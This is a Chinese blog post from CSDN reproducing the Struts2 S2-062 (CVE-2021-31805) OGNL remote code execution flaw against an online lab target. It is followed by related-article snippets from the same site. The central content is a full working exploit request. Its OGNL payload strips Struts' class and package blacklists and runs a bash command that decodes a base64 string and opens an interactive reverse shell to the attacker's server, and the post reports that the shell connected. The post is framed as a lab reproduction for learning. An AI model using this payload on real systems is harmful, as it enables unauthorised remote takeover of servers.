Struts2-062复现

已于 2022-07-13 10:42:53 修改
阅读量265 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络安全 web安全
于 2022-07-13 10:27:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kriesa/article/details/125758571
版权

该漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行。

影响版本

Struts 2.0.0 - Struts 2.5.29

复现环境:http://vulfocus.io/#/dashboard 在线靶场,里面有很多可供复现的漏洞环境

根据提示 访问漏洞页面提交参数 构造payload

burp抓包 发送到Reeater get方法改为post方法

完整请求包

POST /s2_062/index.action HTTP/1.1

Host: 123.58.236.76:34432

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

Cookie: JSESSIONID=2406B54DAAB4B4092E387D404AF3CAF3

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 1159



name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b

(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b

(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b

(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b

(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b

(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b

(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b

(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b

(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo, vps的ip地址base64编码然后在url编码}|{base64,-d}|{bash,-i}'}))

执行命令反弹shell,命令经过base64编码处理并且对其url编码 或者直接Ctrl+U

数据包截图  

反弹成功

kriesa
关注
专栏目录
【漏洞复现Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3411
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
struts2 s2-048漏洞复现
wodepzw的博客
11-19 421
我在docker中搭得的vulhub靶场 1.开启环境 命令 开启docker :service docker start 启动环境 :docker-compose up -d 2.环境启动好后访问http://your-ip:8080/showcase/ 3.这个漏洞在integraton下的struts1处 4.访问Integration/Struts 1 Integration: 5....
Struts2 远程代码执行漏洞S2-062 (CVE-2021-31805)
qq_43175881的博客
09-28 90
此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。如果开发人员使用%{…} 语法进行强制 OGNL 解析,仍有一些特殊的 TAG 属性可以执行二次解析。对不受信任的用户输入使用强制 OGNL 解析可能会导致远程代码执行。开发人员使用%{…} 语法进行强制 OGNL 解析,有一些特殊的TAG属性可以执行二次解析。对不受信任的用户输入使用强制 OGNL 解析可能会导致远程代码执行。靶机(centos7.8)
有了这个网络安全面试题,面试就像开了挂!(附PDF)
最新发布
lvaolan的博客
02-26 957
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Struts2-062_RCE的简单复现(CVE-2021-31805)
ANYOUZHEN的博客
06-04 661
漏洞描述:漏洞等级:高危漏洞本次漏洞复现为本地环境,使用开源靶场中的环境:输入指令:docker-compose up -d --buildsudo docker-compose up -d接下来启动漏洞扫描: 但是在我的kali2022上面出现了报错:解决办法在网上找到了一篇大佬文章:[Linux] docker 出现Got permission denied while trying to connect to the Docker daemon socket...问题的解决办法_Cloudeeee
Struts2 S2-015复现
ZJT6666666的博客
02-04 330
Struts2 S2-015复现
struts2漏洞复现
不知名白帽的博客
06-24 1039
struts2漏洞复现s2-001、s2-005、s2-007、s2-008)
vulhub复现之struts漏洞复现
m0_70483044的博客
10-06 490
Struts2就是一个框架,它是属于web层的一个框架,是Struts1的一个升级版,但是它和Struts1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts2的控制功能就相当于MVC中的Controller的功能,用来控制页面的转向。​。
Struts2-052复现,并反弹Shell
Becktick的博客
03-31 1290
Struts2-052复现,并反弹Shell 技术无罪,请勿用于恶意用途 转载请注明出处! 测试机:kali linux,win10 工具:burp 靶机:cenOS7 测试机IP:192.168.213.136 靶机IP:192.168.213.138 环境: docker 一. 环境搭建 docker搭建可以参考这位小姐姐的文章: http://bbs.dark5.net/?thread-24...
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
qaq517384的博客
09-06 235
vulhub msf
struts2实例 学生信息管理系统
11-12
struts2实现的学生信息管理系统 <?xml version="1.0" encoding="UTF-8"?> list.jsp list.jsp list.jsp list.jsp list.jsp <!-- Edit.jsp List.action List.action -->
Struts2.5.2的配置及问题解决
08-19
针对Struts2.5.2最新版本的配置进行了梳理,通过一步步的步骤和发生的问题点的解决,完成对Struts2.5.2的配置。
struts2 CVE-2020-17530漏洞复现
Armandhe的博客
06-08 918
我丝毫不敢休息,又肝了一篇
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3801
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
struts2系列漏洞复现
小石头的博客
12-11 848
安装java环境,搭建Tomcat,版本apache-tomcat-9.0.0.M26 启动Tomcat: 解决不能远程访问问题(访问403) \Tomcat 9.0\conf\tomcat-user.xml 补充 <role rolename="manager"/>  <role rolename="manager-gui"/>  <role rolename="admin"/>  <role rol..
Struts2 S2-009复现
ZJT6666666的博客
12-21 212
Struts2 S2-009复现
Struts2漏洞复现
weixin_51151498的博客
12-14 1398
Struts2漏洞复现
Struts2-062_RCE简单复现(CVE-2021-31805)
crowsec
04-18 2347
2022年04月13号,apache官网公布了Struts2 最新版远程代码执行漏洞,该漏洞编号为CVE-2021-31805。 Apache Struts2是一个用于开发Java EE网络应用程序的Web框架。在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 本次漏洞是对CVE-2020-17530修复之后的绕过,当使用语法%{...}应用强制OGNL解析,某些tag标签的属性仍然可以被二次解析。
漏洞复现Struts2系列漏洞复现总结
weixin_42282189的博客
11-03 2361
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 Struts2-045(CVE-2017-5683) 0x01 漏洞描述 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。 Struts2默认使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartR.
Struts2-002 XSS漏洞深度解析与复现
"Apache Struts2中的S2-002漏洞是一个关键的安全问题,涉及到跨站脚本(XSS)攻击,主要影响Struts2框架的特定版本。此漏洞出现在和标签中,当这两个标签的`includeParams`属性设置为`all`时,攻击者可以利用这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值